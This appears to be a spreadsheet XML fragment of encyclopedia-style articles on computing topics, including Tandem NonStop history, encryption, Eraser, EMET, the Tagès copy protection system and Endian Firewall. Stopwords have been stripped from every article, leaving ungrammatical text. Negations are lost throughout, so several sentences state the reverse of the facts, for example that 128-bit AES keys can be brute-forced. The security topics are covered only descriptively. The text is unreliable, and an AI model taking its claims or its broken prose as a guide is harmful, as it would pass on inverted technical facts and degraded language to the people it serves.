required months shared work mips tandem eliminate work around final subtle bugs. nonstop himalaya k-series 1993, tandem released nonstop himalaya k-series faster mips r4400, native mode nsk, fully expandable cyclone system components. these still connected dynabus, dynabus+, original bus, running performance headroom. open system services 1995, nonstop kernel extended unix-like posix environment called open system services. original guardian shell remained available. nonstop himalaya s-series 1997 tandem introduced nonstop himalaya s-series top-level system architecture based servernet connections. servernet replaced obsolete dynabus, fox, buses. much faster, general, could extended two-way redundancy arbitrary fabric point-to-point connections. tandem designed servernet needs promoted others; evolved infiniband industry standard. s-series machines used mips processors, including r4400, r10000, r12000, r14000. design later, faster mips cores primarily funded silicon graphics inc. intel's pentium overtook performance risc designs also sgi's graphics business shrunk. after r10000, investment significant mips core designs high-end servers. tandem needed eventually move nonstop product line onto microprocessor architecture competitive fast chips. acquisition compaq, attempted migration alpha jimmy treybig remained company founded downturn 1996. next roel pieper, joined company 1996 president ceo. re-branding promote true wintel (windows/intel) platform conducted in-house brand creative team ronald may, later went co-found silicon valley brand forum 1999. concept worked, shortly thereafter company acquired compaq. compaq's x86-based server division early outside adopter tandem's servernet/infiniband interconnect technology. 1997, compaq acquired tandem computers company nonstop customer base balance compaq's heavy focus low-end pcs. 1998, compaq also acquired much larger digital equipment corporation inherited alpha risc servers openvms tru64 unix customer bases. tandem midway porting nonstop product line mips r12000 microprocessors intel's itanium merced microprocessors. this project restarted alpha target align nonstop compaq's large server lines. 2001, compaq terminated alpha engineering investments favor itanium microprocessors. acquisition hewlett packard, tns/e migration itanium 2001, hewlett packard similarly made choice abdicate successful pa-risc product lines favor intel's itanium microprocessors helped design. shortly thereafter, compaq announced plan merge consolidate similar product lines. this contentious merger became official 2002. consolidations painful destroyed way" engineer-oriented cultures, combined company know sell complex systems enterprises profit, improvement surviving nonstop division customers. ways, tandem's journey hp-inspired start-up, hp-inspired competitor, division "bringing tandem back original roots", definitely re-port nsk-based nonstop product line mips processors itanium-based processors finally completed branded integrity nonstop servers". (this integrity nonstop unrelated tandem's original "integrity" series unix.) because possible itanium mckinley chips clock-level lock stepping, integrity nonstop machines instead comparisons chip states longer time scales, interrupt points various software sync points interrupts. intermediate sync points automatically triggered every n'th taken branch instruction, also explicitly inserted long loop bodies nonstop compilers. machine design supports dual triple redundancy, either three physical microprocessors logical itanium processor. triple version sold customers needing utmost reliability. this checking approach called nsaa, nonstop advanced architecture.as earlier migration stack machines mips microprocessors, customer software carried forward without source changes. "native mode" source code compiled directly mips machine code simply recompiled itanium. some older "non native" software still stack machine form. these automatically ported onto itanium object code translation techniques. itanium migration intel people working tandem/hp long history porting kernel onto hardware. latest endeavor move itanium intel architecture. completed 2014 first systems already commercially available. inclusion fault-tolerant (fourteen data rate) infiniband double-wide switches provides times increase system interconnect capacity responding business growth. outlook, guardian also became base neoview operating system used neoview systems tailored business intelligence enterprise data warehouse use. nonstop sql/mx also starting point neoview sql, tailored business intelligence use. code also ported linux served basis apache trafodion project. corporate culture treybig’s business plan included detailed ideas building corporate culture reflecting treybig's values, paid week sabbaticals years employees, annual gift shares tandem stock employees, weekly all-employee party known beer bust fridays, world-wide closed circuit monthly telecast ("first friday") keep employees informed. headquarters office also outdoor basketball court swimming pool manned lifeguard. employees families welcome full kids weekends. user groups itug (international tandem user group) part connect (users group) oztug australia zealand tandem users group here: oztug linkedin bitug (british isles nonstop (tandem) user group) also gray (computer scientist) nonstop stratus technologies references external links nonstop computing home main nonstop computing page nonstop dummies short booklet introducing nonstop computing platform, 2014 tandem technical reports page number tandem white papers tandem systems review pdfs 1983–1994 tandem computers unplugged book focusing company history, 2014</t>
  </si>
  <si>
    <t>Ephemeral key</t>
  </si>
  <si>
    <t>cryptographic called ephemeral generated execution establishment process. cases ephemeral keys used once, within single session (e.g., broadcast applications) sender generates ephemeral pair message private combined separately recipient's public key. contrast static key. private public ephemeral agreement private (resp. public) ephemeral agreement keys private (resp. public) keys asymmetric pairs used single establishment transaction establish keys (e.g., wrapping keys, data encryption keys, keys) and, optionally, keying material (e.g., initialization vectors). also cryptographic types session external links recommendation management part general, nist special publication 800-57 nist cryptographic toolkit references</t>
  </si>
  <si>
    <t>Eraser (software)</t>
  </si>
  <si>
    <t>eraser open-source secure file erasure tool available windows operating system. supports file volume wiping.eraser securely erases data overwriting data irrecoverable. supports variety data destruction standards, including british (infosec standard american 5220.22-m, gutmann method features 35-pass overwrite.the tool recommended techadvisor, guardian, world, tool suggested united states government computer emergency readiness team. also bleachbit ccleaner data erasure shred (unix) references external links official website documentation</t>
  </si>
  <si>
    <t>Enhanced Mitigation Experience Toolkit</t>
  </si>
  <si>
    <t>enhanced mitigation experience toolkit (emet) freeware security toolkit microsoft windows, developed microsoft. provides unified interface enable fine-tune windows security features. used extra layer defense malware attacks, firewall antivirus software.emet targeted mostly system administrators newest version supported windows user running windows later, windows server 2008 later, .net framework installed. final edition windows supported emet version 1703 (creator's update). microsoft changed coding fall creator's update windows longer supported emet. older versions used windows features available. version last version support windows microsoft announced emet reach life july 2018. website microsoft.com/emet leads bing search site. successors emet processmitigations module—aka process mitigation management tool—and windows defender exploit guard available windows windows server 2016. references external links official website</t>
  </si>
  <si>
    <t>Error 58</t>
  </si>
  <si>
    <t>Dual modular redundancy</t>
  </si>
  <si>
    <t>reliability engineering, dual modular redundancy (dmr) components system duplicated, providing redundancy case fail. particularly applied systems duplicated components work parallel, particularly fault-tolerant computer systems. typical example complex computer system duplicated nodes, node fail, another ready carry work. provides robustness failure component, error detection case instruments computers give result give different results, provide error correction, component correct malfunctioning cannot automatically determined. there adage effect, stating: "never chronometers; take three." meaning, chronometers contradict, sailor know reading correctly. lockstep fault-tolerant machine uses replicated elements operating parallel. time, replications element state. inputs provided replication, outputs expected. outputs replications compared using voting circuit. machine replications element termed dual modular redundant (dmr). voting circuit detect mismatch recovery relies methods. examples include 1ess switch. machine three replications element termed triple modular redundant (tmr). voting circuit determine replication error two-to-one vote observed. case, voting circuit output correct result, discard erroneous version. after this, internal state erroneous replication assumed different two, voting circuit switch mode. this model applied larger number replications. also spare references</t>
  </si>
  <si>
    <t>Dump (Unix)</t>
  </si>
  <si>
    <t>dump command program unix unix-like operating systems used back file systems. operates blocks, filesystem abstractions files directories. dump back file system tape another disk. often used across network piping output bzip2 ssh. dump utility first appeared version at&amp;t unix. dump command also part ascii's msx-dos2 tools msx-dos version usage dump [-0123456789aclnsu] records] blocksize] cachesize] dumpdates] density] file pipecommand] level] feet] date] filesystem also restore (program) (file format) cpio rsync references external links home page linux ext2 filesystem dump/restore utilities</t>
  </si>
  <si>
    <t>Encryption by date</t>
  </si>
  <si>
    <t>this timeline public releases introductions computer encryption algorithms. references horst feistel. block cipher cryptographic system, patent 3,798,359. filed june 1971. (ibm) henry beker fred piper (1982). cipher systems: protection communications. john wiley sons. 263–267. isbn 0-471-89192-4. kilian phillip rogaway, protect exhaustive search (postscript), advances cryptology crypto '96, springer-verlag (1996), 252–267. ingrid schaumuller-bichl, analyse data encryption standard synthese verwandter chiffriersysteme, ph.d. thesis, linz university, 1981. german). bruce schneier, matt blaze (december 1994). macguffin block cipher algorithm (pdf/postscript). international workshop fast software encryption (fse '94). leuven: springer-verlag. 97–110. retrieved 2007-08-24.</t>
  </si>
  <si>
    <t>Encryption software</t>
  </si>
  <si>
    <t>encryption software software uses cryptography prevent unauthorized access digital information. cryptography used protect digital information computers well digital information sent computers internet. classification there many software products provide encryption. software encryption uses cipher obscure content ciphertext. classify type software type cipher used. ciphers divided categories: public ciphers (also known asymmetric ciphers), symmetric ciphers. encryption software based either public symmetric encryption. another classify software encryption categorize purpose. using approach, software encryption classified software encrypts "data transit" software encrypts "data rest". data transit generally uses public ciphers, data rest generally uses symmetric ciphers. symmetric ciphers divided stream ciphers block ciphers. stream ciphers typically encrypt plaintext byte time, commonly used encrypt real-time communications, audio video information. used establish initial state keystream generator, output generator used encrypt plaintext. block cipher algorithms split plaintext fixed-size blocks encrypt block time. example, processes 16-byte blocks, predecessor encrypted blocks eight bytes. there also well-known case used data transit data rest. data transit data transit data sent computer network. when data endpoints, confidential information vulnerable. payload (confidential information) encrypted secure confidentiality, well integrity validity.often, data transit entities know case visiting website. establishing relationship securely sharing encryption secure information exchanged, roles, policies, procedures accomplish developed; known public infrastructure, pki. once established secure connection, symmetric shared endpoints. symmetric preferred private public keys symmetric cipher much efficient (uses less cycles) asymmetric cipher. there several methods encrypting data transit, ipsec, scp, sftp, ssh, openpgp https. data rest data rest refers data saved persistent storage. data rest generally encrypted symmetric key. encryption applied different layers storage stack. example, encryption configured disk layer, subset disk called partition, volume, combination disks partitions, layer file system, within user space applications database applications host operating system. with full disk encryption, entire disk encrypted (except bits necessary boot access disk using unencrypted boot/preboot partition). disks partitioned multiple partitions, partition encryption used encrypt individual disk partitions. volumes, created combining partitions, encrypted using volume encryption. file systems, also composed partitions, encrypted using filesystem-level encryption. directories referred encrypted files within directory encrypted. file encryption encrypts single file. database encryption acts data stored, accepting unencrypted information writing information persistent storage encrypted data. device-level encryption, somewhat vague term includes encryption-capable tape drives, used offload encryption tasks cpu. transit data rest when need securely transmit data rest, without ability create secure connection, user space tools developed support need. these tools rely upon receiver publishing public key, sender able obtain public key. sender able create symmetric encrypt information, receiver's public securely protect transmission information symmetric key. this allows secure transmission information party another. performance performance encryption software measured relative speed cpu. thus, cycle byte (sometimes abbreviated cpb), unit indicating number clock cycles microprocessor need byte data processed, usual unit measurement. cycles byte serve partial indicator real-world performance cryptographic functions. applications offer encryption called native encryption, including databases applications microsoft sql, oracle, mongodb, commonly rely direct usage cycles performance. this often impacts desirability encryption businesses seeking greater security ease satisfying compliance impacting speed scale data within organizations partners. illegal encryption main page: ransomware encryption done illegally. scammers spread ransomware encrypts (locks) user files demands ransom large money) paid decrypt files, usually time limit. wannacry ransomware gave users days price doubled days files destroyed forever. also cryptographic protocol public (asymmetric) algorithms symmetric algorithms transport layer security comparison disk encryption software defense strategy (computing) references external links encryption software curlie</t>
  </si>
  <si>
    <t>Dynamic Logical Partitioning</t>
  </si>
  <si>
    <t>dynamic logical partitioning (dlpar), capability logical partition (lpar) reconfigured dynamically, without shut operating system runs lpar. dlpar enables memory, capacity, interfaces moved nondisruptively lpars within server. dlpar supported operating systems almost power4 follow-on power systems since then. linux kernel power also supported dlpar, dynamic reconfiguration capabilities limited capacity devices, memory. october 2009, seven years announcement dlpar memory, slots, linux finally added capability dlpar memory power systems. fundamentals dlpar described systems journal paper titled: "dynamic reconfiguration: basic building blocks autonomic computing pseries servers. later power5 processor added enhanced dlpar capabilities, including micro-partitioning: lpars configured processor, single multiprocessor server supporting maximum lpars (and thus independent operating system instances). there many interesting applications dlpar capabilities. primarily, used build agile infrastructures, automate hardware system resource allocation, planning, provisioning. this turn results increased system utilization. example, memory, processor slots added, removed moved another lpar, without rebooting operating system application running lpar. application (http://www.ibm.com/developerworks/eserver/articles/db2_dlpar.html), aware dlpar events automatically tunes changing lpar resources. mainframes operating systems, including linux support even sophisticated forms dynamic lpars. relevant lpar-related features mainframe platforms include intelligent resource director, sysplex, parallel sysplex, geographically dispersed parallel sysplex, hipersockets. system supports lpars single server, mainframes also support additional level virtualization using z/vm ability support thousands operating system instances single server. also virtualization operating system-level virtualization hypervisor hipersocket logical partition (virtual computing platform) micro-partitioning</t>
  </si>
  <si>
    <t>Encryption</t>
  </si>
  <si>
    <t>cryptography, encryption process encoding information. this process converts original representation information, known plaintext, alternative form known ciphertext. ideally, authorized parties decipher ciphertext back plaintext access original information. encryption prevent interference denies intelligible content would-be interceptor. technical reasons, encryption scheme usually uses pseudo-random encryption generated algorithm. possible decrypt message without possessing but, well-designed encryption scheme, considerable computational resources skills required. authorized recipient easily decrypt message provided originator recipients unauthorized users. historically, various forms encryption used cryptography. early encryption techniques often used military messaging. since then, techniques emerged become commonplace areas modern computing. modern encryption schemes concepts public-key symmetric-key. modern encryption techniques ensure security modern computers inefficient cracking encryption. history ancient earliest forms encryption symbol replacement, first found tomb khnumhotep lived 1900 egypt. symbol replacement encryption “non-standard,” means symbols require cipher understand. this type early encryption used throughout ancient greece rome military purposes. famous military encryption developments caesar cipher, system letter normal text shifted fixed number positions alphabet encoded letter. message encoded type encryption could decoded fixed number caesar cipher. around arab mathematician al-kindi developed technique frequency analysis attempt systematically crack caesar ciphers. this technique looked frequency letters encrypted message determine appropriate shift. this technique rendered ineffective creation polyalphabetic cipher leone alberti 1465, incorporated different sets languages. order frequency analysis useful, person trying decrypt message would need know language sender chose. 19th–20th century around 1790, thomas jefferson theorised cipher encode decode messages order provide secure military correspondence. cipher, known today wheel cipher jefferson disk, although never actually built, theorized spool could jumble english message characters. message could decrypted plugging jumbled message receiver identical cipher. similar device jefferson disk, m-94, developed 1917 independently army major joseph mauborne. this device used u.s. military communications 1942.in world axis powers used advanced version m-94 called enigma machine. enigma machine complex unlike jefferson wheel m-94, jumble letters switched completely combination. each day's combination known axis, many thought break code would 17,000 combinations within hours. allies used computing power severely limit number reasonable combinations needed check every day, leading breaking enigma machine. modern today, encryption used transfer communication internet security commerce. computing power continues increase, computer encryption constantly evolving prevent eavesdropping attacks. with first “modern” cipher suits, des, utilizing 56-bit 72,057,594,037,927,936 possibilities able cracked hours minutes eff’s cracker 1999, used brute-force method cracking. modern encryption standards often stronger sizes often 256, like aes(256-bit mode), twofish, chacha20-poly1305, serpent(configurable 512-bit). cipher suits utilizing 128-bit higher key, like aes, able brute-forced total amount keys 3.4028237e+38 possibilities. likely option cracking ciphers high size find vulnerabilities cipher itself, like inherent biases backdoors. example, rc4, stream cipher cracked inherit biases vulnerabilities cipher. encryption cryptography context cryptography, encryption serves mechanism ensure confidentiality. since data visible internet, sensitive information passwords personal communication exposed potential interceptors. process encrypting decrypting messages involves keys. main types keys cryptographic systems symmetric-key public-key (also known asymmetric-key).many complex cryptographic algorithms often simple modular arithmetic implementations. types symmetric-key schemes, encryption decryption keys same. communicating parties must order achieve secure communication. german enigma machine utilized symmetric-key encoding decoding messages. public-key encryption schemes, encryption published anyone encrypt messages. however, receiving party access decryption enables messages read. public-key encryption first described secret document 1973; beforehand, encryption schemes symmetric-key (also called private-key).: although published subsequently, work diffie hellman published journal large readership, value methodology explicitly described. method became known diffie-hellman exchange. (rivest–shamir–adleman) another notable public-key cryptosystem. created 1978, still used today applications involving digital signatures. using number theory, algorithm selects prime numbers, help generate encryption decryption keys.a publicly available public-key encryption application called pretty good privacy (pgp) written 1991 phil zimmermann, distributed free charge source code. purchased symantec 2010 regularly updated. uses encryption long used militaries governments facilitate secret communication. commonly used protecting information within many kinds civilian systems. example, computer security institute reported 2007, companies surveyed utilized encryption data transit, utilized encryption data storage. encryption used protect data rest", information stored computers storage devices (e.g. flash drives). recent years, numerous reports confidential data, customers' personal records, exposed loss theft laptops backup drives; encrypting files rest helps protect physical security measures fail. digital rights management systems, prevent unauthorized reproduction copyrighted material protect software reverse engineering (see also copy protection), another somewhat different example using encryption data rest.encryption also used protect data transit, example data transferred networks (e.g. internet, e-commerce), mobile telephones, wireless microphones, wireless intercom systems, bluetooth devices bank automatic teller machines. there numerous reports data transit intercepted recent years. data also encrypted transmitted across networks order protect eavesdropping network traffic unauthorized users. data erasure conventional methods permanently deleting data storage device involve overwriting device's whole content zeros, ones, patterns process take significant amount time, depending capacity type storage medium. cryptography offers making erasure almost instantaneous. this method called crypto-shredding. example implementation method found devices, cryptographic kept dedicated 'effaceable storage'. because stored device, setup offer full privacy security protection unauthorized person gains physical access device. limitations encryption used 21st century protect digital data information systems. computing power increased years, encryption technology become advanced secure. however, advancement technology also exposed potential limitation today's encryption methods. length encryption indicator strength encryption method. example, original encryption key, (data encryption standard), bits, meaning 2^56 combination possibilities. with today's computing power, 56-bit longer secure, vulnerable hacking brute force attack.quantum computing utilizes properties quantum mechanics order process large amounts data simultaneously. quantum computing found achieve computing speeds thousands times faster today's supercomputers. this computing power presents challenge today's encryption technology. example, encryption utilizes multiplication large prime numbers create semiprime number public key. decoding without private requires semiprime number factored take long time modern computers. would take supercomputer anywhere weeks months factor key. however, quantum computing quantum algorithms factor semiprime number amount time takes normal computers generate this would make data protected current public-key encryption vulnerable quantum computing attacks. other encryption techniques like elliptic curve cryptography symmetric encryption also vulnerable quantum computing.while quantum computing could threat encryption security future, quantum computing currently stands still limited. quantum computing currently commercially available, cannot handle large amounts code, exists computational devices, computers. furthermore, quantum computing advancements able utilized favor encryption well. national security agency (nsa) currently preparing post-quantum encryption standards future. quantum encryption promises level security able counter threat quantum computing. attacks countermeasures encryption important tool sufficient alone ensure security privacy sensitive information throughout lifetime. most applications encryption protect information rest transit, leaving sensitive data clear text potentially vulnerable improper disclosure processing, cloud service example. homomorphic encryption secure multi-party computation emerging techniques compute encrypted data; techniques general turing complete incur high computational and/or communication costs. response encryption data rest, cyber-adversaries developed types attacks. these recent threats encryption data rest include cryptographic attacks, stolen ciphertext attacks, attacks encryption keys, insider attacks, data corruption integrity attacks, data destruction attacks, ransomware attacks. data fragmentation active defense data protection technologies attempt counter attacks, distributing, moving, mutating ciphertext difficult identify, steal, corrupt, destroy. integrity protection ciphertexts encryption, itself, protect confidentiality messages, techniques still needed protect integrity authenticity message; example, verification message authentication code (mac) digital signature usually done hashing algorithm signature. authenticated encryption algorithms designed provide encryption integrity protection together. standards cryptographic software hardware perform encryption widely available, successfully using encryption ensure security challenging problem. single error system design execution allow successful attacks. sometimes adversary obtain unencrypted information without directly undoing encryption. example traffic analysis, tempest, trojan horse.integrity protection mechanisms macs digital signatures must applied ciphertext first created, typically device used compose message, protect message end-to-end along full transmission path; otherwise, node sender encryption agent could potentially tamper encrypting time creation secure encryption device correct keys tampered with. endpoint device configured trust root certificate attacker controls, example, attacker inspect tamper encrypted data performing man-in-the-middle attack anywhere along message's path. common practice interception network operators represents controlled institutionally sanctioned form attack, countries also attempted employ attacks form control censorship. ciphertext length padding even encryption correctly hides message's content cannot tampered rest transit, message's length form metadata still leak sensitive information message. example, well-known crime breach attacks https side-channel attacks relied information leakage length encrypted content. traffic analysis broad class techniques often employs message lengths infer sensitive implementation traffic flows aggregating information large number messages. padding message's payload encrypting help obscure cleartext's true length, cost increasing ciphertext's size introducing increasing bandwidth overhead. messages padded randomly deterministically, approach different tradeoffs. encrypting padding messages form padded uniform random blobs purbs practice guaranteeing cipher text leaks metadata cleartext's content, leaks asymptotically minimal {\displaystyle o(\log \log information length. also references further reading fouché gaines, helen (1939), cryptanalysis: study ciphers their solution, york: dover publications inc, isbn 978-0486200972 kahn, david (1967), codebreakers story secret writing (isbn 0-684-83130-9) preneel, bart (2000), "advances cryptology eurocrypt 2000", springer berlin heidelberg, isbn 978-3-540-67517-4 sinkov, abraham (1966): elementary cryptanalysis: mathematical approach, mathematical association america. isbn 0-88385-622-0 tenzer, theo (2021): super secreto third epoch cryptography: multiple, exponential, quantum-secure all, simple practical encryption everyone, norderstedt, isbn 9783755761174. lindell, yehuda; katz, jonathan (2014), introduction modern cryptography, hall/crc, isbn 978-1466570269 ermoshina, ksenia; musiani, francesca (2022), concealing freedom: making encryption, secure messaging digital liberties (foreword laura denardis)(open access) (pdf), manchester, matteringpress.org, isbn 978-1-912729-22-7</t>
  </si>
  <si>
    <t>Tagès</t>
  </si>
  <si>
    <t>tagès software copy protection system, jointly developed, first, thales group (formerly known thomson-csf) starting 1999. method protection since described twin sectors.the name 'tages' originates etruscan mythology, functions latin spelling alias minor deity, tarchies. first software product protected tagès game, moto racer developed delphine software (dsi) released 2001. 2003, independent company, tagès formed. company focuses development copy protection digital rights management systems, sole vendor tagès copy protection system. tagès copy protection system compatible microsoft windows operating system, employed discs. makers tagès claim main strengths product incorporation "secure area" physical medium, renders production relatively perfect copy protected disc nearly impossible task. additionally, anti-cracking instruments provided protection system (such tagescap, tagès apis tagès vfs); claimed make reverse-engineering tagès-protected applications difficult time-consuming task. features tagescap binary wrapper applied software application's executable file requires changes source code application. provides encryption protected product's executable file(s), attempts protect application debugging, disassembly, reverse-engineering, forms analysis. authentication procedure carries single check, carried start-up protected application. tagès apis libraries allowing developer implement fully customized "protection triggers", potentially appearing stage protected application's execution phase. instance, non-authentic copy protected product detected, developer software product decide upon actions taken circumstances, electing silently degrade aspects product's functionality. tagès apis require modifications additions source code protected application. consequence silently degrading crashing program fails authentication users distinguishing intentional protection behavior application bugs. this resulted support centers receiving large volumes calls eventually determined unauthorized copies. tagès encrypted virtual file system, allowing developer additionally encrypt non-executable content. when successfully authenticated protected application runs, transparent access original, decrypted content; functionality achieved means device driver. should protected application's authentication phase successfully removed means deliberate circumvention, encrypted content decrypted therefore read garbage data, resulting erroneous program behavior. however, encryption executable broken, encryption vfs, additional effort. tagès device drivers optical disc-based copy protection systems (such safedisc, starforce, etc.), tagès installs device drivers part copy protection system. tagès device drivers installed first launch tagès-protected application. removal tagès provides official, standalone, device driver installation uninstallation program. this program functions toggle; tagès device drivers installed, program function uninstaller, otherwise, function installer. both 32-bit 64-bit versions program available. known issues tagès used bind activated game copy hardware configuration time game installed. this issues games even slightly modifying hardware (e.g. replacing graphic card) would require reactivating game (either using limited extra activations provided game publisher, trying request activation renewal technical support). references external links references tagès (requires adobe flash player) technical details cdfreaks. tagès technical workings (2007)</t>
  </si>
  <si>
    <t>Symantec Workspace Virtualization</t>
  </si>
  <si>
    <t>symantec workspace virtualization (abbreviated swv) application virtualization solution microsoft windows symantec, known symantec endpoint virtualization suite (sevs). originally pioneered altiris based technology acquired fslogic named software virtualization solution, allows applications data virtual layers (application layers data layers) instead installed base file system registry. this achieved filter driver layering technology altiris acquired fslogic. placing applications data managed layers called virtual software packages (vsp's), allows on-the-fly activation, deactivation, resetting applications, avoid conflicts applications, remove cleanly without altering base windows installation. altiris acquired symantec corporation 2007, makers norton antivirus, amongst things. available trial basis, must purchased enable full features. free private use. 2008, symantec acquired appstream incorporate streaming virtual applications. according quote dabcc.com, "deliver virtualized, on-demand application delivery management".previous names before-mentioned software virtualization professional. also citrix xenapp app-v vmware thinapp references external links altiris software virtualization website symantec website svs4all user website 'dutch enthousiasts dutch community adepts. 'german svs/swv site package downloads</t>
  </si>
  <si>
    <t>Endian Firewall</t>
  </si>
  <si>
    <t>endian firewall open-source router, firewall gateway security linux distribution developed south tyrolean company endian. product available either free software, commercial software guaranteed support services, hardware appliance (including support services). description endian firewall linux security distribution, independent, security management operating system. system installed using boot operated without monitor online interface keyboard command-line interface. server configured interface serial interface. main task endian firewall gateway, router firewall, proxy web, email, ftp, dns. four different networks (dependent number network cards installed host managed. networks configured interface. with endian differentiated color coding: network: connection insecure internet. green network: secure intranet e.g. file server. orange network: part safe demilitarized zone (dmz) this includes devices operate server must accessible internet, servers. blue network: secure wireless part, wireless devices connected. thus, separated green network, increases security.endian firewall includes support load balancing, means another connection internet network. endian firewall distributes network load network interface controllers. license software developed italian endian appiano, south tyrol community volunteer developers. license model endian provides commercial version free version: commercial version purchased either standalone software (the product called endian simply endian software) order install pcs, well form finished firewalls, special hardware software preinstalled. there currently seven hardware variants different performance different network sizes: mini mercury mercury 100, macro 250, macro 500, macro 1000 macro 2500. both free endian firewall community commercial endian software tailored installation hardware. endian firewall community licensed therefore open source software downloaded free. community version include support features commercial version available. features current version includes following features: gateway ethernet support traffic shaping quality service multiple uplinks uplink failover firewall security firewall (both directions) demilitarized zone intrusion detection system intrusion prevention system web-, ftp- e-mail-antivirus antispam content filter https- interface ssh- access forwarding scheduler automated backups server services transparent http, https, ftp, smtp pop3-proxy server caching dns-server dhcp-server (separately green, blue orange network) network address translation virtual private network (vpn) gateway openvpn ipsec ntp-server policy-based routing (port, address, protocol port) generic snmp support vlan support (ieee 802.1q trunking) user management local radius ldap(s) active directory ntlm single sign-on user group http proxy content filter rules logging monitoring visualized live viewer (ajax based), figure "the interface endian firewall" activities stress network hardware connection statistics forwarding possibility logs external syslog server ntopng integration event-based notifications e-mail others support software-raid history compared original endian firewall fork linux firewall ipcop, turn fork smoothwall. numerous developments, one-fifth original ipcop code used. newer versions based initially linux from scratch version rhel, centos. with upcoming version 3.0, endian firewall virtually "smoothwall-" "ipcop-free". greatest difference ipcop endian firewall merely pure router-firewall combination, comprehensive gateway security solution (unified threat management). this, virus scanner spam blocker firmly integrated distribution. this allows transport http, ftp, pop3 smtp scanned real-time optionally filtered. also, menus refined ipcop approach, reducing complexity, also reducing reconfigurability individual services. concerning business model, endian different origins smoothwall ipcop follows: smoothwall: commercial version developed smoothwall free version community volunteers. innovations commercial version partially transferred, security updates sometimes deliberately delayed free version. this policy reason forking smoothwall community development ipcop ipcop: development exclusively community volunteers free version. endian firewall: friendly refinement ipcop expand software functions create comprehensive security gateway software. smoothwall, endian firewall also includes features commercial version functions missing free community version. resonance endian firewall part c't-debian-server version (published august 2009) already 2007. july 2005, endian firewall osdir elected project week. linux magazine 09/2008 endian firewall appliances tested system certify test result upper middle comparable products. references external links endian endian spa's project website sourceforge site project</t>
  </si>
  <si>
    <t>Endurability</t>
  </si>
  <si>
    <t>telecommunication, endurability property system, subsystem, equipment, process enables continue function within specified performance limits extended period time, usually months, despite severe natural man-made disturbance, nuclear attack, loss external logistic utility support. endurability compromised temporary failures local capability exists restore maintain system, subsystem, equipment, process acceptable performance level. references federal standard 1037c mil-std-188</t>
  </si>
  <si>
    <t>Energy rebate program</t>
  </si>
  <si>
    <t>energy rebate program, energy credit incentive program, provides cash rebate program customers planning install new, energy efficient information technology (it) equipment cooling systems. these programs push companies construct energy efficient data centers, consolidate compute, storage networking resources virtualization technologies. energy rebate program simple customers apply qualify various energy rebates offered energy service companies, utilities, respective coverage areas. lower equipment's carbon footprint, data center customers looking processes protecting respecting environment eco-friendly operations data center design. this idea pushed organizations green grid, climate savers computing initiative silicon valley leadership group. customer demand energy rebates encourages development programs vendors' computers, storage, networking data center facilities. vendors taking steps provide energy efficient systems working utilities secure rebate savings customers installations. history past, data center designers operators focused data center reliability energy efficiency. equipment cooling concerns costs water cooled infrastructure large scale centers, instance, significant, though secondary issue, buying decisions. increasingly data center power density leading power cooling limitations, companies significant interest energy efficiency potential solution data center issues. customers searching justify costs annual electricity costs, cooling costs, power costs. utilizing energy efficient equipment testing results data center enable companies point potential cost-cutting procedures take place. august 2007 report united states congress, environmental protection agency (epa) estimated energy used power cool servers data centers significant united states. estimated sector consumed billion kilowatt-hours (kwh) 2006 (1.5 percent total u.s. electricity consumption) total electricity cost $4.5 billion. this total expected double next five years."according projections u.s. energy information administration, electricity generation around world nearly double 17.3 trillion kilowatt-hours (kwh) 2005 33.3 trillion 2030." case u.s., power grid simply able keep growth demand additional power using conventional means. u.s., estimated reduction peak demand mere would yield savings billion years nothing resulting reduction green house emissions would accompany peak demand reduction.many u.s. utility companies developed energy rebate programs provide companies incentives energy efficient equipment help lower power demand data centers. energy situation driven vendors offer "green" leases equipment complement utilities' energy rebate programs. energy rebates applied toward leases equipment. customers benefit lower monthly lease payments, accept rebate cash infusion business project. origins energy rebate programs offered utilities began non-residential construction (nrnc) program. pacific electric (pg&amp;e) targeted energy savings toward industry (and commercial businesses). dozens utilities emulating pg&amp;e programs nationally, many utility companies plan implement energy rebate program. basis program standard performance contract (spc). offers non-residential customer installing new, high efficiency equipment systems. period 2009–2011, pg&amp;e reserved, example, million energy credit incentives data centers alone. although consumer awareness utility company rebates still emerging, retailers increasingly gaining ability make customers aware rebates innovative nationwide rebate database services greenohm. energy rebate application process utilities customer applies energy credit incentive (rebate) prior equipment installation. energy savings calculator (usually spreadsheet analysis) used estimate energy savings resulting energy rebate based initial 12-month installation period equipment. energy savings calculator provided local utility, energy certification partner, customer. measurements included must consistent program guidelines. baseline analysis existing equipment required pg&amp;e’s non-residential construction] program used equipment pre-certified pg&amp;e. other utilities vary. services offered energy certification partners validate energy savings rebates projects energy certification partners also often referred energy service companies, escos. esco focuses base-lining, measuring, verifying energy savings rebate incentives installation new, energy efficient equipment data centers. following services provided energy certification partner selected customer: provide help completing utilities’ applications energy savings incentives (rebates). perform spreadsheet development, document assumptions produce energy calculator according utilities’ requirements, vary. document assumptions energy savings spreadsheet summarize approach taken utilities. develop additional validation report needed) describe energy savings resulting rebate installation efficient equipment and/or data center. interface utilities negotiate obtain qualification incentive rebates. assist customer securing rebate check utility. energy rebate eligibility projects generally, four eligible energy savings measurements equipment, combined. these energy savings incentives offered pg&amp;e 2009:1) equipment energy (fans, motors, variable speed drives, compression systems) rebate based first year’s energy savings calculated cent incentive saved varies utility hvac energy (air conditioning refrigeration) rebate based first year’s energy savings calculated cent incentive saved varies utility on-peak demand reduction based reduction on-peak demand varies utility server reduction consolidation and/or virtualization rebate based number physical servers reduced $200 rebate server removed pre- post-inspection required varies utility maximum allowable energy rebates offered qualifying utilities non-residential construction program vary somewhat. example, pg&amp;e offers per-site maximum rebate $500,000; diego electric (sdg&amp;e) offers per-site maximum rebate $350,000. under customized energy savings incentive programs, energy savings diego electric, caps energy rebates. three programs utility companies offer projects utilities actively funded rebate programs typically offer three programs match planned project requirements. pg&amp;e, example, offers incentives rebates retrofit projects well incentives design assistance construction projects help businesses save money manage energy costs. custom programs also available. program non-residential construction (nrnc) savings design non-residential construction (nrnc), also known california savings design program commercial, industrial, high tech agricultural customers encourages energy efficient building process design construction. program popularized california four investor-owned utilities auspices california public utilities commission (cpuc), offers owners design teams variety services follows protocol outlined nrnc/savings design program.program non-residential retrofit (nrr) program customers installing equipment save electricity costs qualifying customized incentives business energy efficiency retrofit projects involving installation high efficiency equipment data center facilities. total incentive payments (rebates) based actual reduction energy usage. customers and/or energy certification partners sponsor projects approach assist completion application forms, confirmation eligibility, guidance technical aspects.program custom program customers receive energy rebates installing new, energy efficiency equipment. customers design energy-saving project propose incentive amount necessary implement project. this usually requires effort negotiation customer and/or energy certification partner, potential energy rebates greater offered construction retrofit programs. typically, measures applied custom program cannot overlap incentive programs construction 